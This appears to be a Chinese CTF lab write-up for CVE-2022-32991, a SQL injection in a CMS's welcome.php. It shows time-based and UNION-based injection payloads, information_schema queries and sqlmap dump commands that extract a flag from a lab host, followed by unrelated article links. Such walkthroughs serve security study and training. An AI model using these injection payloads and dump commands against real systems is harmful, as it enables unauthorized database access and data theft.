春秋云境:CVE-2022-32991(sql注入)

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

获取登录地址

http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80

登录注册

注册成功登录进入注册接口

参数接口一

发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1

SQL盲注未发现利用点

http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1' or '1'=1

继续下一步 查看接口和参数情况

参数接口二:

q step eid n t等http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=60377db362694\&n=1\&t=34

注入点判断方式

参数后加'

参数后加'%2b(select*from(select(sleep(20)))a)%2b'

参数后加' union select 1,2,3,4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=60377db362694' union select 1,2,3,4,5--+\&n=1\&t=34

查询数据库名

n=2' union select 1,2,database(),4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=60377db362694n=2' union select 1,2,database(),4,5--+\&n=1\&t=34

查看表信息

2' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=60377db3626942' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+\&n=1\&t=34

查询表字段信息

' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=60377db3626942' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+

查看flag表中的字段

2' union select 1,2,group_concat(flag),4,5 from flag--+

发现接口参数 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=60377db362694' union select 1,2,group_concat(flag),4,5

flag{e5fb9a56-bfce-48cb-a816-77599da3b03a}

burusuite使用

burpsuite也是一款强大的漏扫工具,通过爬取接口进行扫描发现 接口是否存在安全隐患,具体使用教程就不说了,看个人习惯

sqlmap使用

暴库

保存txt文件执行

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -dbs

爆破表

python sqlmap.py -r D:/bc1.txt --batch -D "ctf" --tables

爆破表字段

python sqlmap.py -r D:/bc1.txt --batch -D "ctf" -T "flag" --columns

爆破具体字段信息

执行--batch -D "ctf" -T "flag" -C "flag" --dump

flag{e5fb9a56-bfce-48cb-a816-77599da3b03a}

SQL注入寻找接口,寻找参数, 寻找注入点, 进行sql盲注 ,查看响应结果值, 工具可以使用sqlmap bp进行测试验证

相关推荐
杨云龙UP12 分钟前
Oracle 19c:RMAN Duplicate异机复制数据库实操_20260402
linux·运维·服务器·数据库·网络协议·tcp/ip·oracle
刘~浪地球17 分钟前
Redis 从入门到精通(七):集合操作详解
数据库·chrome·redis
光泽雨17 分钟前
SQL分组Group By
数据库
我真会写代码32 分钟前
MySQL高频面试题(含详细解析):从基础到高级,备战面试不踩坑
数据库·mysql·面试
观远数据37 分钟前
未来3年企业数据分析的核心:基于自然语言的AI优先决策体系如何搭建
数据库·人工智能·数据分析
YummyJacky38 分钟前
Redis在项目中的应用
数据库·redis·缓存
qq_2837200543 分钟前
MySQL 8.0新特性高频面试题 30 道(超详细答案)
数据库·mysql·面试·mysql8·高频试题
wAEWQ6Ib744 分钟前
[拆解LangChain执行引擎]支持自然语言查询的长期存储
数据库·oracle·langchain
吴声子夜歌1 小时前
Node.js——操作MongoDB
数据库·mongodb·node.js